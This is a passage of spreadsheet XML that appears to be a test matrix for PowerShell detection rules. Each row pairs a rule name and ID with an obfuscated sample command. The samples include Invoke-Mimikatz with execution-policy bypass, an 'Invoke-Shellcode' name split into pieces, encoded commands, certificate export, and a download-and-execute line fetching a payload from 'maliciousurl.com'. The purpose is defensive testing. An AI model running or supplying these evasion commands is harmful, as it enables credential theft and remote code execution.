    <row r="493" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="43" t="n"/>
      <c r="B493" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C493" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D493" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E493" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F493" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G493" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H493" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I493" s="43" t="n"/>
      <c r="J493" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K493" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="43" t="n"/>
      <c r="B494" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C494" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D494" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E494" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F494" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G494" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H494" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I494" s="43" t="n"/>
      <c r="J494" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K494" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="43" t="n"/>
      <c r="B495" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C495" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D495" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E495" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F495" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G495" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H495" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I495" s="43" t="n"/>
      <c r="J495" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K495" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="43" t="n"/>
      <c r="B496" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C496" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D496" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E496" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F496" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G496" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H496" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I496" s="43" t="n"/>
      <c r="J496" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K496" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="43" t="n"/>
      <c r="B497" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C497" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D497" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E497" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F497" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G497" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I497" s="43" t="n"/>
      <c r="J497" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K497" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="43" t="n"/>
      <c r="B498" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C498" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D498" s="44" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E498" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d2hvYW1p'))|  iex"</t>
        </is>
      </c>
      <c r="F498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H498" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I498" s="43" t="n"/>
      <c r="J498" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K498" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="43" t="n"/>
      <c r="B499" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C499" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D499" s="44" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E499" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d2hvYW1p'))|  iex"</t>
        </is>
      </c>
      <c r="F499" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G499" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H499" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I499" s="43" t="n"/>
      <c r="J499" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K499" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="43" t="n"/>
      <c r="B500" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C500" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D500" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E500" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp;('Im'+'port-Module') \"$Env:Temp\suspicious_module.psm1\""</t>
        </is>
      </c>
      <c r="F500" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G500" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I500" s="43" t="n"/>
      <c r="J500" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K500" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="43" t="n"/>
      <c r="B501" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C501" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D501" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E501" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "&amp;('Im'+'port-Module') \" $Env:Temp\suspicious_module.psm1\""</t>
        </is>
      </c>
      <c r="F501" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G501" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H501" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I501" s="44" t="n"/>
      <c r="J501" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K501" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="43" t="n"/>
      <c r="B502" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C502" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D502" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E502" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "&amp;('Im'+'port-Module') \" $Env:Temp\suspicious_module.psm1\""</t>
        </is>
      </c>
      <c r="F502" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G502" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H502" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I502" s="44" t="n"/>
      <c r="J502" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K502" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="43" t="n"/>
      <c r="B503" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C503" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D503" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E503" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaNd "&amp;('Im'+'port-Module') \" $Env:Temp\suspicious_module.psm1\""</t>
        </is>
      </c>
      <c r="F503" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G503" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H503" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I503" s="44" t="n"/>
      <c r="J503" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K503" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="43" t="n"/>
      <c r="B504" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C504" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D504" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E504" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "&amp;('Im'+'port-Module') \" $Env:Temp\suspicious_module.psm1\""</t>
        </is>
      </c>
      <c r="F504" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G504" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H504" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I504" s="44" t="n"/>
      <c r="J504" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K504" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="505" ht="15.75" customHeight="1" s="42">
      <c r="A505" s="43" t="n"/>
      <c r="B505" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C505" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D505" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E505" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F505" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G505" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H505" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I505" s="43" t="n"/>
      <c r="J505" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K505" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="506" ht="15.75" customHeight="1" s="42">
      <c r="A506" s="43" t="n"/>
      <c r="B506" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C506" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D506" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E506" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F506" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G506" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H506" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I506" s="43" t="n"/>
      <c r="J506" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K506" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="507" ht="15.75" customHeight="1" s="42">
      <c r="A507" s="43" t="n"/>
      <c r="B507" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C507" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D507" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E507" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F507" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G507" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H507" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I507" s="43" t="n"/>
      <c r="J507" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K507" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="508" ht="15.75" customHeight="1" s="42">
      <c r="A508" s="43" t="n"/>
      <c r="B508" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C508" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D508" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E508" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F508" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G508" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H508" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I508" s="43" t="n"/>
      <c r="J508" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K508" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="509" ht="15.75" customHeight="1" s="42">
      <c r="A509" s="43" t="n"/>
      <c r="B509" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C509" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D509" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E509" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F509" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G509" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H509" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I509" s="44" t="n"/>
      <c r="J509" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K509" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="510" ht="15.75" customHeight="1" s="42">
      <c r="A510" s="43" t="n"/>
      <c r="B510" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C510" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D510" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E510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510" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G510" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H510" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I510" s="43" t="n"/>
      <c r="J510" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K510" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="511" ht="15.75" customHeight="1" s="42">
      <c r="A511" s="43" t="n"/>
      <c r="B511" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C511" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D511" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E511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511" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G511" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H511" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I511" s="44" t="n"/>
      <c r="J511" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K511" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="512" ht="15.75" customHeight="1" s="42">
      <c r="A512" s="43" t="n"/>
      <c r="B512" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C512" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D512" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E512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512" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G512" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H512" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I512" s="44" t="n"/>
      <c r="J512" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K512" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="513" ht="15.75" customHeight="1" s="42">
      <c r="A513" s="43" t="n"/>
      <c r="B513" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C513" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D513" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E513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513" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G513" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H513" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I513" s="44" t="n"/>
      <c r="J513" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K513" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="514" ht="15.75" customHeight="1" s="42">
      <c r="A514" s="43" t="n"/>
      <c r="B514" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C514" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D514" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E514" s="4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514" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G514" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H514" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I514" s="44" t="n"/>
      <c r="J514" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K514" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="515" ht="15.75" customHeight="1" s="42">
      <c r="A515" s="43" t="n"/>
      <c r="B515" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C515" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D515" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E515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515" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G515" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H515" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I515" s="43" t="n"/>
      <c r="J515" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K515" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="516" ht="15.75" customHeight="1" s="42">
      <c r="A516" s="43" t="n"/>
      <c r="B516" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C516" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D516" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E516" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F516" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G516" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H516" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I516" s="44" t="n"/>
      <c r="J516" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K516" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1" s="42">
      <c r="A517" s="43" t="n"/>
      <c r="B517" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C517" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D517" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E517" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F517" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G517" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H517" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I517" s="43" t="n"/>
      <c r="J517" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K517" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="518" ht="15.75" customHeight="1" s="42">
      <c r="A518" s="43" t="n"/>
      <c r="B518" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C518" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D518" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E518" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F518" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G518" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H518" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I518" s="44" t="n"/>
      <c r="J518" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K518" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1" s="42">
      <c r="A519" s="43" t="n"/>
      <c r="B519" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C519" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D519" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E519" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F519" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G519" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H519" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I519" s="43" t="n"/>
      <c r="J519" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K519" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1" s="42">
      <c r="A520" s="43" t="n"/>
      <c r="B520" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C520" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D520" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E520" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F520" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G520" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H520" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I520" s="43" t="n"/>
      <c r="J520" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K520" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1" s="42">
      <c r="A521" s="43" t="n"/>
      <c r="B521" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C521" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D521" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E521" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F521" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G521" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H521" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I521" s="43" t="n"/>
      <c r="J521" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K521" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1" s="42">
      <c r="A522" s="43" t="n"/>
      <c r="B522" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C522" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D522" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E522" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F522" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G522" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H522" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I522" s="44" t="n"/>
